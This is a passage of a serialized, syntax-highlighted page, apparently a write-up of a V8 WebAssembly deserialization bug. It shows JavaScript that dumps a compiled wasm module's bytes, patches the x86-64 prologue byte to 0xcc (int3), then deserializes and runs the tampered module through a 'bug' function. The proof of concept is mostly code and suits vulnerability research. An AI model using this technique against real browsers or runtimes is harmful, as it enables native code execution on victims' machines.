0",{"type":26,"tag":137,"props":136070,"children":136071},{"style":5601},[136072],{"type":32,"value":1108},{"type":26,"tag":137,"props":136074,"children":136075},{"style":5626},[136076],{"type":32,"value":136077},"97",{"type":26,"tag":137,"props":136079,"children":136080},{"style":5601},[136081],{"type":32,"value":1108},{"type":26,"tag":137,"props":136083,"children":136084},{"style":5626},[136085],{"type":32,"value":136086},"115",{"type":26,"tag":137,"props":136088,"children":136089},{"style":5601},[136090],{"type":32,"value":1108},{"type":26,"tag":137,"props":136092,"children":136093},{"style":5626},[136094],{"type":32,"value":136095},"109",{"type":26,"tag":137,"props":136097,"children":136098},{"style":5601},[136099],{"type":32,"value":1108},{"type":26,"tag":137,"props":136101,"children":136102},{"style":5626},[136103],{"type":32,"value":878},{"type":26,"tag":137,"props":136105,"children":136106},{"style":5601},[136107],{"type":32,"value":1108},{"type":26,"tag":137,"props":136109,"children":136110},{"style":5626},[136111],{"type":32,"value":1817},{"type":26,"tag":137,"props":136113,"children":136114},{"style":5601},[136115],{"type":32,"value":1108},{"type":26,"tag":137,"props":136117,"children":136118},{"style":5626},[136119],{"type":32,"value":1817},{"type":26,"tag":137,"props":136121,"children":136122},{"style":5601},[136123],{"type":32,"value":1108},{"type":26,"tag":137,"props":136125,"children":136126},{"style":5626},[136127],{"type":32,"value":1817},{"type":26,"tag":137,"props":136129,"children":136130},{"style":5601},[136131],{"type":32,"value":1108},{"type":26,"tag":137,"props":136133,"children":136134},{"style":5626},[136135],{"type":32,"value":878},{"type":26,"tag":137,"props":136137,"children":136138},{"style":5601},[136139],{"type":32,"value":1108},{"type":26,"tag":137,"props":136141,"children":136142},{"style":5626},[136143],{"type":32,"value":3235},{"type":26,"tag":137,"props":136145,"children":136146},{"style":5601},[136147],{"type":32,"value":1108},{"type":26,"tag":137,"props":136149,"children":136150},{"style":5626},[136151],{"type":32,"value":878},{"type":26,"tag":137,"props":136153,"children":136154},{"style":5601},[136155],{"type":32,"value":1108},{"type":26,"tag":137,"props":136157,"children":136158},{"style":5626},[136159],{"type":32,"value":136160},"96",{"type":26,"tag":137,"props":136162,"children":136163},{"style":5601},[136164],{"type":32,"value":1108},{"type":26,"tag":137,"props":136166,"children":136167},{"style":5626},[136168],{"type":32,"value":1817},{"type":26,"tag":137,"props":136170,"children":136171},{"style":5601},[136172],{"type":32,"value":1108},{"type":26,"tag":137,"props":136174,"children":136175},{"style":5626},[136176],{"type":32,"value":1817},{"type":26,"tag":137,"props":136178,"children":136179},{"style":5601},[136180],{"type":32,"value":1108},{"type":26,"tag":137,"props":136182,"children":136183},{"style":5626},[136184],{"type":32,"value":344},{"type":26,"tag":137,"props":136186,"children":136187},{"style":5601},[136188],{"type":32,"value":1108},{"type":26,"tag":137,"props":136190,"children":136191},{"style":5626},[136192],{"type":32,"value":277},{"type":26,"tag":137,"props":136194,"children":136195},{"style":5601},[136196],{"type":32,"value":1108},{"type":26,"tag":137,"props":136198,"children":136199},{"style":5626},[136200],{"type":32,"value":878},{"type":26,"tag":137,"props":136202,"children":136203},{"style":5601},[136204],{"type":32,"value":1108},{"type":26,"tag":137,"props":136206,"children":136207},{"style":5626},[136208],{"type":32,"value":1817},{"type":26,"tag":137,"props":136210,"children":136211},{"style":5601},[136212],{"type":32,"value":1108},{"type":26,"tag":137,"props":136214,"children":136215},{"style":5626},[136216],{"type":32,"value":375},{"type":26,"tag":137,"props":136218,"children":136219},{"style":5601},[136220],{"type":32,"value":1108},{"type":26,"tag":137,"props":136222,"children":136223},{"style":5626},[136224],{"type":32,"value":58487},{"type":26,"tag":137,"props":136226,"children":136227},{"style":5601},[136228],{"type":32,"value":1108},{"type":26,"tag":137,"props":136230,"children":136231},{"style":5626},[136232],{"type":32,"value":878},{"type":26,"tag":137,"props":136234,"children":136235},{"style":5601},[136236],{"type":32,"value":1108},{"type":26,"tag":137,"props":136238,"children":136239},{"style":5626},[136240],{"type":32,"value":20701},{"type":26,"tag":137,"props":136242,"children":136243},{"style":5601},[136244],{"type":32,"value":1108},{"type":26,"tag":137,"props":136246,"children":136247},{"style":5626},[136248],{"type":32,"value":136086},{"type":26,"tag":137,"props":136250,"children":136251},{"style":5601},[136252],{"type":32,"value":1108},{"type":26,"tag":137,"props":136254,"children":136255},{"style":5626},[136256],{"type":32,"value":136257},"104",{"type":26,"tag":137,"props":136259,"children":136260},{"style":5601},[136261],{"type":32,"value":1108},{"type":26,"tag":137,"props":136263,"children":136264},{"style":5626},[136265],{"type":32,"value":136266},"101",{"type":26,"tag":137,"props":136268,"children":136269},{"style":5601},[136270],{"type":32,"value":1108},{"type":26,"tag":137,"props":136272,"children":136273},{"style":5626},[136274],{"type":32,"value":136275},"108",{"type":26,"tag":137,"props":136277,"children":136278},{"style":5601},[136279],{"type":32,"value":1108},{"type":26,"tag":137,"props":136281,"children":136282},{"style":5626},[136283],{"type":32,"value":136275},{"type":26,"tag":137,"props":136285,"children":136286},{"style":5601},[136287],{"type":32,"value":6099},{"type":26,"tag":137,"props":136289,"children":136290},{"class":5559,"line":5417},[136291,136295,136299,136303,136307,136311,136315,136319,136323,136327,136331,136335,136339,136343,136347,136352],{"type":26,"tag":137,"props":136292,"children":136293},{"style":5626},[136294],{"type":32,"value":136068},{"type":26,"tag":137,"props":136296,"children":136297},{"style":5601},[136298],{"type":32,"value":1108},{"type":26,"tag":137,"props":136300,"children":136301},{"style":5626},[136302],{"type":32,"value":1817},{"type":26,"tag":137,"props":136304,"children":136305},{"style":5601},[136306],{"type":32,"value":1108},{"type":26,"tag":137,"props":136308,"children":136309},{"style":5626},[136310],{"type":32,"value":91855},{"type":26,"tag":137,"props":136312,"children":136313},{"style":5601},[136314],{"type":32,"value":1108},{"type":26,"tag":137,"props":136316,"children":136317},{"style":5626},[136318],{"type":32,"value":3235},{"type":26,"tag":137,"props":136320,"children":136321},{"style":5601},[136322],{"type":32,"value":1108},{"type":26,"tag":137,"props":136324,"children":136325},{"style":5626},[136326],{"type":32,"value":878},{"type":26,"tag":137,"props":136328,"children":136329},{"style":5601},[136330],{"type":32,"value":1108},{"type":26,"tag":137,"props":136332,"children":136333},{"style":5626},[136334],{"type":32,"value":277},{"type":26,"tag":137,"props":136336,"children":136337},{"style":5601},[136338],{"type":32,"value":1108},{"type":26,"tag":137,"props":136340,"children":136341},{"style":5626},[136342],{"type":32,"value":1817},{"type":26,"tag":137,"props":136344,"children":136345},{"style":5601},[136346],{"type":32,"value":1108},{"type":26,"tag":137,"props":136348,"children":136349},{"style":5626},[136350],{"type":32,"value":136351},"11",{"type":26,"tag":137,"props":136353,"children":136354},{"style":5601},[136355],{"type":32,"value":6099},{"type":26,"tag":137,"props":136357,"children":136358},{"class":5559,"line":5642},[136359],{"type":26,"tag":137,"props":136360,"children":136361},{"style":5601},[136362],{"type":32,"value":6352},{"type":26,"tag":137,"props":136364,"children":136365},{"class":5559,"line":5745},[136366,136370,136374,136378,136382,136387,136391,136395,136399,136404],{"type":26,"tag":137,"props":136367,"children":136368},{"style":5573},[136369],{"type":32,"value":37643},{"type":26,"tag":137,"props":136371,"children":136372},{"style":5584},[136373],{"type":32,"value":74225},{"type":26,"tag":137,"props":136375,"children":136376},{"style":5590},[136377],{"type":32,"value":5593},{"type":26,"tag":137,"props":136379,"children":136380},{"style":5573},[136381],{"type":32,"value":34528},{"type":26,"tag":137,"props":136383,"children":136384},{"style":5584},[136385],{"type":32,"value":136386}," WebAssembly",{"type":26,"tag":137,"props":136388,"children":136389},{"style":5601},[136390],{"type":32,"value":470},{"type":26,"tag":137,"props":136392,"children":136393},{"style":5682},[136394],{"type":32,"value":88521},{"type":26,"tag":137,"props":136396,"children":136397},{"style":5601},[136398],{"type":32,"value":165},{"type":26,"tag":137,"props":136400,"children":136401},{"style":5584},[136402],{"type":32,"value":136403},"wasm_code",{"type":26,"tag":137,"props":136405,"children":136406},{"style":5601},[136407],{"type":32,"value":6430},{"type":26,"tag":137,"props":136409,"children":136410},{"class":5559,"line":5850},[136411,136415,136420,136424,136428,136432,136436,136441,136445,136450],{"type":26,"tag":137,"props":136412,"children":136413},{"style":5573},[136414],{"type":32,"value":37643},{"type":26,"tag":137,"props":136416,"children":136417},{"style":5584},[136418],{"type":32,"value":136419}," inst",{"type":26,"tag":137,"props":136421,"children":136422},{"style":5590},[136423],{"type":32,"value":5593},{"type":26,"tag":137,"props":136425,"children":136426},{"style":5573},[136427],{"type":32,"value":34528},{"type":26,"tag":137,"props":136429,"children":136430},{"style":5584},[136431],{"type":32,"value":136386},{"type":26,"tag":137,"props":136433,"children":136434},{"style":5601},[136435],{"type":32,"value":470},{"type":26,"tag":137,"props":136437,"children":136438},{"style":5682},[136439],{"type":32,"value":136440},"Instance",{"type":26,"tag":137,"props":136442,"children":136443},{"style":5601},[136444],{"type":32,"value":165},{"type":26,"tag":137,"props":136446,"children":136447},{"style":5584},[136448],{"type":32,"value":136449},"mod",{"type":26,"tag":137,"props":136451,"children":136452},{"style":5601},[136453],{"type":32,"value":6430},{"type":26,"tag":137,"props":136455,"children":136456},{"class":5559,"line":5878},[136457,136461,136465,136469,136473,136477,136481,136485,136490],{"type":26,"tag":137,"props":136458,"children":136459},{"style":5573},[136460],{"type":32,"value":37643},{"type":26,"tag":137,"props":136462,"children":136463},{"style":5584},[136464],{"type":32,"value":82611},{"type":26,"tag":137,"props":136466,"children":136467},{"style":5590},[136468],{"type":32,"value":5593},{"type":26,"tag":137,"props":136470,"children":136471},{"style":5584},[136472],{"type":32,"value":136419},{"type":26,"tag":137,"props":136474,"children":136475},{"style":5601},[136476],{"type":32,"value":470},{"type":26,"tag":137,"props":136478,"children":136479},{"style":5584},[136480],{"type":32,"value":40482},{"type":26,"tag":137,"props":136482,"children":136483},{"style":5601},[136484],{"type":32,"value":470},{"type":26,"tag":137,"props":136486,"children":136487},{"style":5584},[136488],{"type":32,"value":136489},"shell",{"type":26,"tag":137,"props":136491,"children":136492},{"style":5601},[136493],{"type":32,"value":5604},{"type":26,"tag":137,"props":136495,"children":136496},{"class":5559,"line":5891},[136497],{"type":26,"tag":137,"props":136498,"children":136499},{"emptyLinePlaceholder":18},[136500],{"type":32,"value":6276},{"type":26,"tag":137,"props":136502,"children":136503},{"class":5559,"line":5909},[136504,136508,136513,136517,136521],{"type":26,"tag":137,"props":136505,"children":136506},{"style":5590},[136507],{"type":32,"value":58990},{"type":26,"tag":137,"props":136509,"children":136510},{"style":5682},[136511],{"type":32,"value":136512},"WasmTierUpFunction",{"type":26,"tag":137,"props":136514,"children":136515},{"style":5601},[136516],{"type":32,"value":165},{"type":26,"tag":137,"props":136518,"children":136519},{"style":5584},[136520],{"type":32,"value":78903},{"type":26,"tag":137,"props":136522,"children":136523},{"style":5601},[136524],{"type":32,"value":6430},{"type":26,"tag":137,"props":136526,"children":136527},{"class":5559,"line":5930},[136528,136532,136537,136541,136546,136550,136554,136558],{"type":26,"tag":137,"props":136529,"children":136530},{"style":5573},[136531],{"type":32,"value":37643},{"type":26,"tag":137,"props":136533,"children":136534},{"style":5584},[136535],{"type":32,"value":136536}," serialized",{"type":26,"tag":137,"props":136538,"children":136539},{"style":5590},[136540],{"type":32,"value":5593},{"type":26,"tag":137,"props":136542,"children":136543},{"style":5590},[136544],{"type":32,"value":136545}," %",{"type":26,"tag":137,"props":136547,"children":136548},{"style":5682},[136549],{"type":32,"value":135544},{"type":26,"tag":137,"props":136551,"children":136552},{"style":5601},[136553],{"type":32,"value":165},{"type":26,"tag":137,"props":136555,"children":136556},{"style":5584},[136557],{"type":32,"value":136449},{"type":26,"tag":137,"props":136559,"children":136560},{"style":5601},[136561],{"type":32,"value":6430},{"type":26,"tag":137,"props":136563,"children":136564},{"class":5559,"line":5939},[136565,136569,136573,136577,136581,136585,136589,136594],{"type":26,"tag":137,"props":136566,"children":136567},{"style":5573},[136568],{"type":32,"value":14378},{"type":26,"tag":137,"props":136570,"children":136571},{"style":5584},[136572],{"type":32,"value":11748},{"type":26,"tag":137,"props":136574,"children":136575},{"style":5590},[136576],{"type":32,"value":5593},{"type":26,"tag":137,"props":136578,"children":136579},{"style":5573},[136580],{"type":32,"value":34528},{"type":26,"tag":137,"props":136582,"children":136583},{"style":5682},[136584],{"type":32,"value":136055},{"type":26,"tag":137,"props":136586,"children":136587},{"style":5601},[136588],{"type":32,"value":165},{"type":26,"tag":137,"props":136590,"children":136591},{"style":5584},[136592],{"type":32,"value":136593},"serialized",{"type":26,"tag":137,"props":136595,"children":136596},{"style":5601},[136597],{"type":32,"value":6430},{"type":26,"tag":137,"props":136599,"children":136600},{"class":5559,"line":6191},[136601,136606,136610,136614,136618,136623,136627,136631,136635,136640,136644,136649,136653,136657,136662],{"type":26,"tag":137,"props":136602,"children":136603},{"style":5584},[136604],{"type":32,"value":136605},"console",{"type":26,"tag":137,"props":136607,"children":136608},{"style":5601},[136609],{"type":32,"value":470},{"type":26,"tag":137,"props":136611,"children":136612},{"style":5682},[136613],{"type":32,"value":104534},{"type":26,"tag":137,"props":136615,"children":136616},{"style":5601},[136617],{"type":32,"value":165},{"type":26,"tag":137,"props":136619,"children":136620},{"style":6837},[136621],{"type":32,"value":136622},"'['",{"type":26,"tag":137,"props":136624,"children":136625},{"style":5590},[136626],{"type":32,"value":11491},{"type":26,"tag":137,"props":136628,"children":136629},{"style":5584},[136630],{"type":32,"value":11748},{"type":26,"tag":137,"props":136632,"children":136633},{"style":5601},[136634],{"type":32,"value":470},{"type":26,"tag":137,"props":136636,"children":136637},{"style":5682},[136638],{"type":32,"value":136639},"join",{"type":26,"tag":137,"props":136641,"children":136642},{"style":5601},[136643],{"type":32,"value":165},{"type":26,"tag":137,"props":136645,"children":136646},{"style":6837},[136647],{"type":32,"value":136648},"', '",{"type":26,"tag":137,"props":136650,"children":136651},{"style":5601},[136652],{"type":32,"value":5671},{"type":26,"tag":137,"props":136654,"children":136655},{"style":5590},[136656],{"type":32,"value":356},{"type":26,"tag":137,"props":136658,"children":136659},{"style":6837},[136660],{"type":32,"value":136661}," ']'",{"type":26,"tag":137,"props":136663,"children":136664},{"style":5601},[136665],{"type":32,"value":6430},{"type":26,"tag":35,"props":136667,"children":136668},{},[136669],{"type":32,"value":136670},"This produces the following output:",{"type":26,"tag":5512,"props":136672,"children":136674},{"code":136673},"[147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93, 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0]\n",[136675],{"type":26,"tag":130,"props":136676,"children":136677},{"__ignoreMap":7},[136678],{"type":32,"value":136673},{"type":26,"tag":35,"props":136680,"children":136681},{},[136682,136684,136690,136692,136698,136700,136706,136707,136713,136715,136720],{"type":32,"value":136683},"The bytes ",{"type":26,"tag":130,"props":136685,"children":136687},{"className":136686},[],[136688],{"type":32,"value":136689},"85, 72, 137, 229, ...",{"type":32,"value":136691}," correspond to the x86-64 function prologue (",{"type":26,"tag":130,"props":136693,"children":136695},{"className":136694},[],[136696],{"type":32,"value":136697},"push rbp; mov rbp, rsp",{"type":32,"value":136699},"). We replace the first byte with ",{"type":26,"tag":130,"props":136701,"children":136703},{"className":136702},[],[136704],{"type":32,"value":136705},"0xcc",{"type":32,"value":19052},{"type":26,"tag":130,"props":136708,"children":136710},{"className":136709},[],[136711],{"type":32,"value":136712},"int3",{"type":32,"value":136714}," opcode), and use this modified buffer as the serialized input to ",{"type":26,"tag":130,"props":136716,"children":136718},{"className":136717},[],[136719],{"type":32,"value":135518},{"type":32,"value":7072},{"type":26,"tag":5512,"props":136722,"children":136724},{"code":136723,"language":38211,"meta":7,"className":38209,"style":7},"(async () => {\n  const wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  const buffer = new Uint8Array([\n    147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64,\n    0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0,\n    0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 204, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93,\n    195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0,\n  ]);\n  let r = bug(wasm_code, buffer.buffer);\n  result = (await r.next()).value;\n  const wasm_instance = new WebAssembly.Instance(result);\n  const f = wasm_instance.exports.shell;\n  f();\n})();\n",[136725],{"type":26,"tag":130,"props":136726,"children":136727},{"__ignoreMap":7},[136728,136751,136778,136998,137065,137073,137100,137314,137566,137817,138043,138287,138507,138514,138563,138608,138652,138691,138703],{"type":26,"tag":137,"props":136729,"children":136730},{"class":5559,"line":5560},[136731,136735,136739,136743,136747],{"type":26,"tag":137,"props":136732,"children":136733},{"style":5601},[136734],{"type":32,"value":165},{"type":26,"tag":137,"props":136736,"children":136737},{"style":5573},[136738],{"type":32,"value":38741},{"type":26,"tag":137,"props":136740,"children":136741},{"style":5601},[136742],{"type":32,"value":42293},{"type":26,"tag":137,"props":136744,"children":136745},{"style":5573},[136746],{"type":32,"value":17413},{"type":26,"tag":137,"props":136748,"children":136749},{"style":5601},[136750],{"type":32,"value":5875},{"type":26,"tag":137,"props":136752,"children":136753},{"class":5559,"line":5412},[136754,136758,136762,136766,136770,136774],{"type":26,"tag":137,"props":136755,"children":136756},{"style":5573},[136757],{"type":32,"value":38784},{"type":26,"tag":137,"props":136759,"children":136760},{"style":5584},[136761],{"type":32,"value":136042},{"type":26,"tag":137,"props":136763,"children":136764},{"style":5590},[136765],{"type":32,"value":5593},{"type":26,"tag":137,"props":136767,"children":136768},{"style":5573},[136769],{"type":32,"value":34528},{"type":26,"tag":137,"props":136771,"children":136772},{"style":5682},[136773],{"type":32,"value":136055},{"type":26,"tag":137,"props":136775,"children":136776},{"style":5601},[136777],{"type":32,"value":136060},{"type":26,"tag":137,"props":136779,"children":136780},{"class":5559,"line":5417},[136781,136786,136790,136794,136798,136802,136806,136810,136814,136818,136822,136826,136830,136834,136838,136842,136846,136850,136854,136858,136862,136866,136870,136874,136878,136882,136886,136890,136894,136898,136902,136906,136910,136914,136918,136922,136926,136930,136934,136938,136942,136946,136950,136954,136958,136962,136966,136970,136974,136978,136982,136986,136990,136994],{"type":26,"tag":137,"props":136782,"children":136783},{"style":5626},[136784],{"type":32,"value":136785},"    0",{"type":26,"tag":137,"props":136787,"children":136788},{"style":5601},[136789],{"type":32,"value":1108},{"type":26,"tag":137,"props":136791,"children":136792},{"style":5626},[136793],{"type":32,"value":136077},{"type":26,"tag":137,"props":136795,"children":136796},{"style":5601},[136797],{"type":32,"value":1108},{"type":26,"tag":137,"props":136799,"children":136800},{"style":5626},[136801],{"type":32,"value":136086},{"type":26,"tag":137,"props":136803,"children":136804},{"style":5601},[136805],{"type":32,"value":1108},{"type":26,"tag":137,"props":136807,"children":136808},{"style":5626},[136809],{"type":32,"value":136095},{"type":26,"tag":137,"props":136811,"children":136812},{"style":5601},[136813],{"type":32,"value":1108},{"type":26,"tag":137,"props":136815,"children":136816},{"style":5626},[136817],{"type":32,"value":878},{"type":26,"tag":137,"props":136819,"children":136820},{"style":5601},[136821],{"type":32,"value":1108},{"type":26,"tag":137,"props":136823,"children":136824},{"style":5626},[136825],{"type":32,"value":1817},{"type":26,"tag":137,"props":136827,"children":136828},{"style":5601},[136829],{"type":32,"value":1108},{"type":26,"tag":137,"props":136831,"children":136832},{"style":5626},[136833],{"type":32,"value":1817},{"type":26,"tag":137,"props":136835,"children":136836},{"style":5601},[136837],{"type":32,"value":1108},{"type":26,"tag":137,"props":136839,"children":136840},{"style":5626},[136841],{"type":32,"value":1817},{"type":26,"tag":137,"props":136843,"children":136844},{"style":5601},[136845],{"type":32,"value":1108},{"type":26,"tag":137,"props":136847,"children":136848},{"style":5626},[136849],{"type":32,"value":878},{"type":26,"tag":137,"props":136851,"children":136852},{"style":5601},[136853],{"type":32,"value":1108},{"type":26,"tag":137,"props":136855,"children":136856},{"style":5626},[136857],{"type":32,"value":3235},{"type":26,"tag":137,"props":136859,"children":136860},{"style":5601},[136861],{"type":32,"value":1108},{"type":26,"tag":137,"props":136863,"children":136864},{"style":5626},[136865],{"type":32,"value":878},{"type":26,"tag":137,"props":136867,"children":136868},{"style":5601},[136869],{"type":32,"value":1108},{"type":26,"tag":137,"props":136871,"children":136872},{"style":5626},[136873],{"type":32,"value":136160},{"type":26,"tag":137,"props":136875,"children":136876},{"style":5601},[136877],{"type":32,"value":1108},{"type":26,"tag":137,"props":136879,"children":136880},{"style":5626},[136881],{"type":32,"value":1817},{"type":26,"tag":137,"props":136883,"children":136884},{"style":5601},[136885],{"type":32,"value":1108},{"type":26,"tag":137,"props":136887,"children":136888},{"style":5626},[136889],{"type":32,"value":1817},{"type":26,"tag":137,"props":136891,"children":136892},{"style":5601},[136893],{"type":32,"value":1108},{"type":26,"tag":137,"props":136895,"children":136896},{"style":5626},[136897],{"type":32,"value":344},{"type":26,"tag":137,"props":136899,"children":136900},{"style":5601},[136901],{"type":32,"value":1108},{"type":26,"tag":137,"props":136903,"children":136904},{"style":5626},[136905],{"type":32,"value":277},{"type":26,"tag":137,"props":136907,"children":136908},{"style":5601},[136909],{"type":32,"value":1108},{"type":26,"tag":137,"props":136911,"children":136912},{"style":5626},[136913],{"type":32,"value":878},{"type":26,"tag":137,"props":136915,"children":136916},{"style":5601},[136917],{"type":32,"value":1108},{"type":26,"tag":137,"props":136919,"children":136920},{"style":5626},[136921],{"type":32,"value":1817},{"type":26,"tag":137,"props":136923,"children":136924},{"style":5601},[136925],{"type":32,"value":1108},{"type":26,"tag":137,"props":136927,"children":136928},{"style":5626},[136929],{"type":32,"value":375},{"type":26,"tag":137,"props":136931,"children":136932},{"style":5601},[136933],{"type":32,"value":1108},{"type":26,"tag":137,"props":136935,"children":136936},{"style":5626},[136937],{"type":32,"value":58487},{"type":26,"tag":137,"props":136939,"children":136940},{"style":5601},[136941],{"type":32,"value":1108},{"type":26,"tag":137,"props":136943,"children":136944},{"style":5626},[136945],{"type":32,"value":878},{"type":26,"tag":137,"props":136947,"children":136948},{"style":5601},[136949],{"type":32,"value":1108},{"type":26,"tag":137,"props":136951,"children":136952},{"style":5626},[136953],{"type":32,"value":20701},{"type":26,"tag":137,"props":136955,"children":136956},{"style":5601},[136957],{"type":32,"value":1108},{"type":26,"tag":137,"props":136959,"children":136960},{"style":5626},[136961],{"type":32,"value":136086},{"type":26,"tag":137,"props":136963,"children":136964},{"style":5601},[136965],{"type":32,"value":1108},{"type":26,"tag":137,"props":136967,"children":136968},{"style":5626},[136969],{"type":32,"value":136257},{"type":26,"tag":137,"props":136971,"children":136972},{"style":5601},[136973],{"type":32,"value":1108},{"type":26,"tag":137,"props":136975,"children":136976},{"style":5626},[136977],{"type":32,"value":136266},{"type":26,"tag":137,"props":136979,"children":136980},{"style":5601},[136981],{"type":32,"value":1108},{"type":26,"tag":137,"props":136983,"children":136984},{"style":5626},[136985],{"type":32,"value":136275},{"type":26,"tag":137,"props":136987,"children":136988},{"style":5601},[136989],{"type":32,"value":1108},{"type":26,"tag":137,"props":136991,"children":136992},{"style":5626},[136993],{"type":32,"value":136275},{"type":26,"tag":137,"props":136995,"children":136996},{"style":5601},[136997],{"type":32,"value":6099},{"type":26,"tag":137,"props":136999,"children":137000},{"class":5559,"line":5642},[137001,137005,137009,137013,137017,137021,137025,137029,137033,137037,137041,137045,137049,137053,137057,137061],{"type":26,"tag":137,"props":137002,"children":137003},{"style":5626},[137004],{"type":32,"value":136785},{"type":26,"tag":137,"props":137006,"children":137007},{"style":5601},[137008],{"type":32,"value":1108},{"type":26,"tag":137,"props":137010,"children":137011},{"style":5626},[137012],{"type":32,"value":1817},{"type":26,"tag":137,"props":137014,"children":137015},{"style":5601},[137016],{"type":32,"value":1108},{"type":26,"tag":137,"props":137018,"children":137019},{"style":5626},[137020],{"type":32,"value":91855},{"type":26,"tag":137,"props":137022,"children":137023},{"style":5601},[137024],{"type":32,"value":1108},{"type":26,"tag":137,"props":137026,"children":137027},{"style":5626},[137028],{"type":32,"value":3235},{"type":26,"tag":137,"props":137030,"children":137031},{"style":5601},[137032],{"type":32,"value":1108},{"type":26,"tag":137,"props":137034,"children":137035},{"style":5626},[137036],{"type":32,"value":878},{"type":26,"tag":137,"props":137038,"children":137039},{"style":5601},[137040],{"type":32,"value":1108},{"type":26,"tag":137,"props":137042,"children":137043},{"style":5626},[137044],{"type":32,"value":277},{"type":26,"tag":137,"props":137046,"children":137047},{"style":5601},[137048],{"type":32,"value":1108},{"type":26,"tag":137,"props":137050,"children":137051},{"style":5626},[137052],{"type":32,"value":1817},{"type":26,"tag":137,"props":137054,"children":137055},{"style":5601},[137056],{"type":32,"value":1108},{"type":26,"tag":137,"props":137058,"children":137059},{"style":5626},[137060],{"type":32,"value":136351},{"type":26,"tag":137,"props":137062,"children":137063},{"style":5601},[137064],{"type":32,"value":6099},{"type":26,"tag":137,"props":137066,"children":137067},{"class":5559,"line":5745},[137068],{"type":26,"tag":137,"props":137069,"children":137070},{"style":5601},[137071],{"type":32,"value":137072},"  ]);\n",{"type":26,"tag":137,"props":137074,"children":137075},{"class":5559,"line":5850},[137076,137080,137084,137088,137092,137096],{"type":26,"tag":137,"props":137077,"children":137078},{"style":5573},[137079],{"type":32,"value":38784},{"type":26,"tag":137,"props":137081,"children":137082},{"style":5584},[137083],{"type":32,"value":127818},{"type":26,"tag":137,"props":137085,"children":137086},{"style":5590},[137087],{"type":32,"value":5593},{"type":26,"tag":137,"props":137089,"children":137090},{"style":5573},[137091],{"type":32,"value":34528},{"type":26,"tag":137,"props":137093,"children":137094},{"style":5682},[137095],{"type":32,"value":136055},{"type":26,"tag":137,"props":137097,"children":137098},{"style":5601},[137099],{"type":32,"value":136060},{"type":26,"tag":137,"props":137101,"children":137102},{"class":5559,"line":5878},[137103,137108,137112,137116,137120,137125,137129,137134,137138,137143,137147,137152,137156,137161,137165,137170,137174,137179,137183,137188,137192,137196,137200,137204,137208,137213,137217,137222,137226,137230,137234,137238,137242,137246,137250,137254,137258,137262,137266,137270,137274,137278,137282,137286,137290,137294,137298,137302,137306,137310],{"type":26,"tag":137,"props":137104,"children":137105},{"style":5626},[137106],{"type":32,"value":137107},"    147",{"type":26,"tag":137,"props":137109,"children":137110},{"style":5601},[137111],{"type":32,"value":1108},{"type":26,"tag":137,"props":137113,"children":137114},{"style":5626},[137115],{"type":32,"value":21013},{"type":26,"tag":137,"props":137117,"children":137118},{"style":5601},[137119],{"type":32,"value":1108},{"type":26,"tag":137,"props":137121,"children":137122},{"style":5626},[137123],{"type":32,"value":137124},"222",{"type":26,"tag":137,"props":137126,"children":137127},{"style":5601},[137128],{"type":32,"value":1108},{"type":26,"tag":137,"props":137130,"children":137131},{"style":5626},[137132],{"type":32,"value":137133},"192",{"type":26,"tag":137,"props":137135,"children":137136},{"style":5601},[137137],{"type":32,"value":1108},{"type":26,"tag":137,"props":137139,"children":137140},{"style":5626},[137141],{"type":32,"value":137142},"20",{"type":26,"tag":137,"props":137144,"children":137145},{"style":5601},[137146],{"type":32,"value":1108},{"type":26,"tag":137,"props":137148,"children":137149},{"style":5626},[137150],{"type":32,"value":137151},"119",{"type":26,"tag":137,"props":137153,"children":137154},{"style":5601},[137155],{"type":32,"value":1108},{"type":26,"tag":137,"props":137157,"children":137158},{"style":5626},[137159],{"type":32,"value":137160},"44",{"type":26,"tag":137,"props":137162,"children":137163},{"style":5601},[137164],{"type":32,"value":1108},{"type":26,"tag":137,"props":137166,"children":137167},{"style":5626},[137168],{"type":32,"value":137169},"43",{"type":26,"tag":137,"props":137171,"children":137172},{"style":5601},[137173],{"type":32,"value":1108},{"type":26,"tag":137,"props":137175,"children":137176},{"style":5626},[137177],{"type":32,"value":137178},"127",{"type":26,"tag":137,"props":137180,"children":137181},{"style":5601},[137182],{"type":32,"value":1108},{"type":26,"tag":137,"props":137184,"children":137185},{"style":5626},[137186],{"type":32,"value":137187},"62",{"type":26,"tag":137,"props":137189,"children":137190},{"style":5601},[137191],{"type":32,"value":1108},{"type":26,"tag":137,"props":137193,"children":137194},{"style":5626},[137195],{"type":32,"value